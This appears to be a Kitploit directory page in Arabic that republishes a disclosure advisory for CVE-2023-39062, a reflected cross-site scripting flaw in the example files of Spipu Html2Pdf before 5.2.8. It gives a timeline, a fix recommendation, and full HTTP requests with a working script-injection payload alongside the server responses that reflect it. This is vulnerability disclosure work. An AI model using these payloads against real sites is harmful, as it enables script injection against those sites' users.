Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-39062 — Spipu Html2Pdf < 5.2.8 - ثغرات XSS في ملفات الأمثلة | Kitploit
أدوات/GitHubGitHub/afine-com/cve-2023-39062
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubafine-com/cve-2023-39062

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - ثغرات XSS في ملفات الأمثلة

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - ثغرات XSS في ملفات الأمثلة.

الخط الزمني

  • إبلاغ البائع بالثغرة: 18.07.2023
  • إصدار النسخة الجديدة المصلحة 5.2.8: 18.07.2023
  • الكشف العام: 23.08.2023

الوصف

ثغرة من نوع Cross-Site-Scripting (XSS) في ملفات أمثلة Spipu Html2Pdf. تسمح هذه الثغرة للمهاجم بتنفيذ كود JavaScript غير موثوق به في سياق المستخدم المسجل حاليًا.

توجد الثغرة في أي معامل يتم تمريره إلى ملفي الأمثلة example9.php و forms.php.

مثال على طلب إلى سكربت forms.php:

root@kitploit:~
GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
Host: example.afine.com
Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

استجابة الخادم:

root@kitploit:~
HTTP/1.1 200 OK
Server: Apache
Content-Length: 2215
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<page footer="form">
    <h1>Test de formulaire</h1><br>
    <br>
    <form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
        <input type="hidden" name="test" value="1">

[...]

مثال على طلب إلى سكربت example9.php:

root@kitploit:~
GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
Host: example.afine.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

استجابة الخادم:

root@kitploit:~
HTTP/1.1 200 OK
Date: Sat, 08 Jul 2023 18:32:51 GMT
Server: Apache
X-Powered-By: PHP/7.4.8
Content-Length: 795
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<body>
<br>
Ceci est un exemple de génération de PDF via un bouton :)<br>
<br>
<img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&amp;py=20" alt="image_php" ><br>
<br>
<br>
        <form method="get" action="">

[...]

حدثت هذه المشكلة بسبب عدم تعقيم معاملات الطلب المقدَّمة. تم إصلاح هذه المشكلة في إصدار Spipu Html2Pdf 5.2.8.

الإصدارات المتأثرة

< 5.2.8

التوصية

قم بتحديث Spipu Html2Pdf إلى الإصدار 5.2.8 أو أحدث.

المراجع

  • https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md
  • https://nvd.nist.gov/vuln/detail/CVE-2023-39062
تنزيل الأداة